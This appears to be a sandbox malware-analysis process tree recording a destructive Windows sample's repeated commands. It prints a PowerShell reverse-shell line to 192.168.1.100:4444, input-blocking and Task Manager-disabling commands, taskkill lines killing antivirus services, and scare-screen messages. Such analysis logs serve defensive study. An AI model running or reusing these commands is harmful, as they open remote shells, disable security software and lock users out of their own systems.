        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        35⤵
        
        PID:3564
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ymxbpw4p\ymxbpw4p.cmdline"
        36⤵
        
        PID:1648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        35⤵
        
        PID:5544
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bk4nqnvy\bk4nqnvy.cmdline"
        36⤵
        
        PID:7016
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1D0.tmp" "c:\Users\Admin\AppData\Local\Temp\bk4nqnvy\CSC35C6474A48F64D52B219282E1C282336.TMP"
        37⤵
        
        PID:6164
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        35⤵
        
        PID:6784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        35⤵
        
        PID:7000
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kuhlsqco\kuhlsqco.cmdline"
        36⤵
        
        PID:7084
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9AF.tmp" "c:\Users\Admin\AppData\Local\Temp\kuhlsqco\CSC69305C4CAA074CF0BDE6F7D2846C1F82.TMP"
        37⤵
        
        PID:536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        35⤵
        
        PID:5648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5432
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        35⤵
        
        PID:6908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        33⤵
        
        PID:2444
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1motpqqo\1motpqqo.cmdline"
        34⤵
        
        PID:1952
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        33⤵
        
        PID:7000
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rujlr11i\rujlr11i.cmdline"
        34⤵
        
        PID:5388
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFD0D.tmp" "c:\Users\Admin\AppData\Local\Temp\rujlr11i\CSC98109D96354343348929C3AE666DE854.TMP"
        35⤵
        
        PID:6712
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        33⤵
        
        PID:5340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        33⤵
        
        PID:6512
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wf4odrpw\wf4odrpw.cmdline"
        34⤵
        
        PID:7124
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3F3.tmp" "c:\Users\Admin\AppData\Local\Temp\wf4odrpw\CSC62478C5161F44A019D85B8B801A458B.TMP"
        35⤵
        
        PID:6788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        33⤵
        
        PID:6500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        33⤵
        
        PID:5124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        33⤵
        
        PID:8380
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        31⤵
        
        PID:5980
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\omjo4fpr\omjo4fpr.cmdline"
        32⤵
        
        PID:5248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        31⤵
        
        PID:5544
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ke0ogl2x\ke0ogl2x.cmdline"
        32⤵
        
        PID:5156
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF9A2.tmp" "c:\Users\Admin\AppData\Local\Temp\ke0ogl2x\CSC9937420CE9144DA6AFBDD3F8FDD36448.TMP"
        33⤵
        
        PID:6104
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        31⤵
        
        PID:6224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        31⤵
        
        PID:7152
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rq0d5to2\rq0d5to2.cmdline"
        32⤵
        
        PID:7068
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFF11.tmp" "c:\Users\Admin\AppData\Local\Temp\rq0d5to2\CSC1329FFADE9F4AA8A47F7AEEA12A3E78.TMP"
        33⤵
        
        PID:6212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        31⤵
        
        PID:6736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        31⤵
        
        PID:8232
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        29⤵
        
        PID:5252
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5q4ryavv\5q4ryavv.cmdline"
        30⤵
        
        PID:5684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        29⤵
        
        PID:6728
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5nmloohq\5nmloohq.cmdline"
        30⤵
        
        PID:4464
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF3F5.tmp" "c:\Users\Admin\AppData\Local\Temp\5nmloohq\CSCCA6DE4845A634F55943463686FC548DB.TMP"
        31⤵
        
        PID:1116
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        29⤵
        
        PID:6628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        29⤵
        
        PID:2804
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\53ltyauz\53ltyauz.cmdline"
        30⤵
        
        PID:7140
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFAAC.tmp" "c:\Users\Admin\AppData\Local\Temp\53ltyauz\CSC57E056B28B93446B924A7570CEC2BD.TMP"
        31⤵
        
        PID:6956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        29⤵
        
        PID:5392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        29⤵
        
        PID:8504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        27⤵
        
        PID:3692
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hzkxpxhu\hzkxpxhu.cmdline"
        28⤵
        
        PID:1456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        27⤵
        
        PID:5416
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\svxn3sfj\svxn3sfj.cmdline"
        28⤵
        
        PID:5404
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESED9C.tmp" "c:\Users\Admin\AppData\Local\Temp\svxn3sfj\CSC443DB64A783744F1A9AB46A5C96555DB.TMP"
        29⤵
        
        PID:6264
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        27⤵
        
        PID:6464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        27⤵
        
        PID:6596
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qzzuotwh\qzzuotwh.cmdline"
        28⤵
        
        PID:2532
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF368.tmp" "c:\Users\Admin\AppData\Local\Temp\qzzuotwh\CSCE8DF68F4CA0147BFB6590D4B6583BF9.TMP"
        29⤵
        
        PID:6012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        27⤵
        
        PID:5620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        27⤵
        
        PID:9076
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        27⤵
        
        PID:6264
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        27⤵
        
        PID:6848
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        27⤵
        
        PID:8568
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        27⤵
        Kills process with taskkill
        
        PID:7336
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        27⤵
        
        PID:1376
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        27⤵
        
        PID:8032
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        27⤵
        Kills process with taskkill
        
        PID:8680
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        25⤵
        
        PID:1424
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lesjj00c\lesjj00c.cmdline"
        26⤵
        
        PID:4420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        25⤵
        
        PID:3448
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\umjnulur\umjnulur.cmdline"
        26⤵
        
        PID:5628
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE9E3.tmp" "c:\Users\Admin\AppData\Local\Temp\umjnulur\CSCA3A72A761BFF4E45BC223A815BF4B5B3.TMP"
        27⤵
        
        PID:1424
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        25⤵
        
        PID:1432
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        25⤵
        
        PID:1832
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vvhcvxbw\vvhcvxbw.cmdline"
        26⤵
        
        PID:6452
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF02C.tmp" "c:\Users\Admin\AppData\Local\Temp\vvhcvxbw\CSCA1904A3D36E24972A6693DEDFEEAE45.TMP"
        27⤵
        
        PID:6512
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        25⤵
        
        PID:7000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        25⤵
        
        PID:8196
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        25⤵
        
        PID:7596
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        25⤵
        
        PID:5408
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        25⤵
        
        PID:5600
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        25⤵
        
        PID:6428
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        25⤵
        
        PID:6812
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        25⤵
        
        PID:8284
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        25⤵
        
        PID:5800
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        25⤵
        
        PID:6128
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        25⤵
        
        PID:4124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        23⤵
        
        PID:4036
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rjihfakq\rjihfakq.cmdline"
        24⤵
        
        PID:4912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        23⤵
        
        PID:5964
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fvw0452j\fvw0452j.cmdline"
        24⤵
        
        PID:5736
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE530.tmp" "c:\Users\Admin\AppData\Local\Temp\fvw0452j\CSC93F576318CDF46A392E918C89F803BF9.TMP"
        25⤵
        
        PID:5000
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        23⤵
        
        PID:5856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
